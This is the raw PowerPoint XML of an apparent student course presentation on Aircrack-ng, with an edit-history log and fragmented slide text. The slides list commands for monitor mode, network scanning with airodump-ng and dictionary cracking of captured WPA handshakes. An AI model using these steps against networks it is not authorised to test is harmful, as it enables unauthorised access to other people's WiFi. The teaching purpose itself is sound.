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i Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}"/>
    <pc:docChg chg="undo custSel addSld modSld">
      <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:16:21.723" v="2468" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:16:21.723" v="2468" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3890581454" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:15:53.811" v="2443" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3890581454" sldId="256"/>
            <ac:spMk id="2" creationId="{39C144C2-C956-4634-B7E8-F69CD311521D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:16:21.723" v="2468" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3890581454" sldId="256"/>
            <ac:spMk id="3" creationId="{0B69626B-E1FB-468D-9B3C-7F29A3C3BB7A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:48:18.971" v="1459" actId="1035"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1499963077" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:18:31.048" v="200" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1499963077" sldId="257"/>
            <ac:spMk id="2" creationId="{A03A10B3-80E2-4781-AA4C-ABBDF87CB378}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:48:18.971" v="1459" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1499963077" sldId="257"/>
            <ac:spMk id="3" creationId="{B936F5DD-A1F9-488C-ABCD-F85EA1050642}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:24:06.476" v="445" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1499963077" sldId="257"/>
            <ac:picMk id="1026" creationId="{7DD3C97F-1681-452E-B38B-275D45EF2BDF}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:31:02.907" v="765" actId="1038"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2486527002" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:27:27.645" v="472" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2486527002" sldId="258"/>
            <ac:spMk id="2" creationId="{26712AC2-0438-4504-9F2D-E92BDD7446BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:30:49.746" v="713" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2486527002" sldId="258"/>
            <ac:spMk id="3" creationId="{038FA477-70D0-4250-B1C4-141D24828612}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:31:02.907" v="765" actId="1038"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2486527002" sldId="258"/>
            <ac:picMk id="5" creationId="{7AD12D2B-4181-4DB9-9DBA-9A4B115C835F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:35:01.905" v="994" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3572376674" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:31:42.972" v="767" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3572376674" sldId="259"/>
            <ac:spMk id="2" creationId="{7361A9DC-3D01-4D91-97B6-4450447A3557}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:35:01.905" v="994" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3572376674" sldId="259"/>
            <ac:spMk id="3" creationId="{EA094F60-48B1-4CF2-8965-B4DBD89843C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:33:58.050" v="940" actId="1035"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3572376674" sldId="259"/>
            <ac:picMk id="5" creationId="{72C985E7-F895-4D6F-AEBF-E29D2BCAA1B5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:34:21.811" v="945" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3572376674" sldId="259"/>
            <ac:picMk id="7" creationId="{F55B1C0E-F5FD-41DD-928B-B7CFB529D9E0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:39:17.363" v="1308" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4018200878" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:36:04.472" v="996" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4018200878" sldId="260"/>
            <ac:spMk id="2" creationId="{2F21453C-8F5E-4B41-821F-056D59EB4145}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:39:03.968" v="1304" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4018200878" sldId="260"/>
            <ac:spMk id="3" creationId="{D211B136-CDEE-40EC-A167-2269C2879F25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:39:17.363" v="1308" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4018200878" sldId="260"/>
            <ac:picMk id="5" creationId="{ABCB2350-92B1-415D-A490-B35EC54DA7F6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:54:00.206" v="1685" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3407914269" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:39:30.082" v="1310" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3407914269" sldId="261"/>
            <ac:spMk id="2" creationId="{E125DE78-90E0-411C-A232-DF9747E15857}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:54:00.206" v="1685" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3407914269" sldId="261"/>
            <ac:spMk id="3" creationId="{4D04DCF1-0879-48E9-AA2E-EE58E31FAF73}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:52:56.699" v="1625" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3407914269" sldId="261"/>
            <ac:picMk id="4" creationId="{B10A25B9-9DBE-4FE4-8DD8-A5DE99EDF92D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:52:59.812" v="1626" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3407914269" sldId="261"/>
            <ac:picMk id="6" creationId="{612855DA-76AA-4438-B5E2-EC1489C294E3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:59:45.643" v="2009" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4093074853" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:53:35.672" v="1628" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4093074853" sldId="262"/>
            <ac:spMk id="2" creationId="{755CEB38-E423-4A22-BDC5-2B0045E92092}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:59:17.108" v="2000" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4093074853" sldId="262"/>
            <ac:spMk id="3" creationId="{189CE185-F7C2-4908-B363-A86874B58519}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:59:29.507" v="2004" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4093074853" sldId="262"/>
            <ac:picMk id="5" creationId="{DECCB98A-7CAA-4FFE-B092-89CAA6CFF504}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T14:59:45.643" v="2009" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4093074853" sldId="262"/>
            <ac:picMk id="7" creationId="{AABD00AF-1C41-4ECB-B462-FB35DA71D261}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:01:31.843" v="2097" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2458790312" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:00:09.764" v="2011" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2458790312" sldId="263"/>
            <ac:spMk id="2" creationId="{2B67FBB9-6487-4547-8E00-33CA5F1A7D9A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:00:46.091" v="2085" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2458790312" sldId="263"/>
            <ac:spMk id="3" creationId="{AE7A37CD-4CAB-46EC-B665-BDF6F5876B7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:01:31.843" v="2097" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2458790312" sldId="263"/>
            <ac:picMk id="5" creationId="{652A73D4-7BCC-497B-B9B9-CFE91EEC95E6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:01:28.683" v="2096" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2458790312" sldId="263"/>
            <ac:picMk id="7" creationId="{C79A4D7D-3374-4B60-906D-40B10496E350}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:06:01.427" v="2405" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4239456659" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:01:49.592" v="2099" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4239456659" sldId="264"/>
            <ac:spMk id="2" creationId="{0F19CC93-CCE0-4D81-BDB3-3B96E4FC19A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:05:40.443" v="2398" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4239456659" sldId="264"/>
            <ac:spMk id="3" creationId="{8D03E518-5D03-405B-948D-8BFA24674F0D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:06:01.427" v="2405" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4239456659" sldId="264"/>
            <ac:picMk id="5" creationId="{A386C25E-037E-482B-BA77-477F117A5098}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:06:18.906" v="2409" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1019658285" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:05:49.439" v="2400" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1019658285" sldId="265"/>
            <ac:spMk id="2" creationId="{CDA2D6BE-5961-4BAC-B30A-35A0CA17F0A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:05:54.635" v="2402" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1019658285" sldId="265"/>
            <ac:spMk id="3" creationId="{7BC28661-70B1-44A9-B7E6-583EE4928FEC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:06:18.906" v="2409" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1019658285" sldId="265"/>
            <ac:picMk id="5" creationId="{6C388FEF-D91D-438C-B471-ABDF98BCF687}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new mod">
        <pc:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:07:00.475" v="2427" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1827766729" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:07:00.475" v="2427" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1827766729" sldId="266"/>
            <ac:spMk id="2" creationId="{3DE3E66A-B859-4195-8957-996E66D4F000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Mahadi Hasan" userId="b55c2b2a87f8be4b" providerId="LiveId" clId="{3E6EA0B0-80FB-41FF-A3E2-5F0878D723BC}" dt="2022-04-28T15:06:37.668" v="2422" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1827766729" sldId="266"/>
            <ac:spMk id="3" creationId="{4B69B283-17FE-4CF7-97E8-D75045588B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93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76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5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7D60-4FB8-4FBD-AAC0-92EE7CCE74C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211245-8425-4B53-9E53-B3FB1BC7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4C2-C956-4634-B7E8-F69CD311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79" y="103765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 Presentation on Aircrack-ng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9626B-E1FB-468D-9B3C-7F29A3C3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167" y="2997725"/>
            <a:ext cx="7766936" cy="19136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u="sng" dirty="0"/>
              <a:t>Presented by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Mehedi Hasan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>ID: 17301046</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Course: CSE-447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8661-70B1-44A9-B7E6-583EE49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19" y="636589"/>
            <a:ext cx="8596668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aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng capture-01.cap –w /directory/words</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      &gt; Brute force attack or dictionary attack.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8FEF-D91D-438C-B471-ABDF98BC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1796965"/>
            <a:ext cx="1023486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E66A-B859-4195-8957-996E66D4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82" y="2578768"/>
            <a:ext cx="9397108" cy="17004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77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ircrack-ng Wifi CrackingTool - Cyber-Today.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD3C97F-1681-452E-B38B-275D45EF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42632"/>
            <a:ext cx="6020778" cy="30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A10B3-80E2-4781-AA4C-ABBDF87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5DD-A1F9-488C-ABCD-F85EA105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66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Aircrack-ng is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> hacking tool. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It focuses on different areas of WiFi security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Monitoring mode. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149996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AC2-0438-4504-9F2D-E92BDD74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WPA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A477-70D0-4250-B1C4-141D2482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696"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Iwconfig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&gt;Checking Interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> wlan0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        &gt;Switching to the monitor mode to activate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng tools.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12D2B-4181-4DB9-9DBA-9A4B115C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34" y="3048679"/>
            <a:ext cx="8596668" cy="38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4F60-48B1-4CF2-8965-B4DBD898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66" y="861179"/>
            <a:ext cx="5306371" cy="2090567"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng start wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         &gt; Start the monitor mode </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Iwconfig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&gt; check again for the monitor mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         &gt; set the frequency and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-power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985E7-F895-4D6F-AEBF-E29D2BCA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63" y="433134"/>
            <a:ext cx="7072137" cy="359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B1C0E-F5FD-41DD-928B-B7CFB529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54612"/>
            <a:ext cx="1219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B136-CDEE-40EC-A167-2269C287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4190"/>
            <a:ext cx="8596668" cy="2326106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-ng wlan0mon </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>        &gt; This will show the interface of channel hopping.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>        &gt; Show all the available channel hopping and stations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>        &gt; Provide BSSID of each of the channel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>        &gt; ESSID and ENC(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> security)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B2350-92B1-415D-A490-B35EC54D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3160296"/>
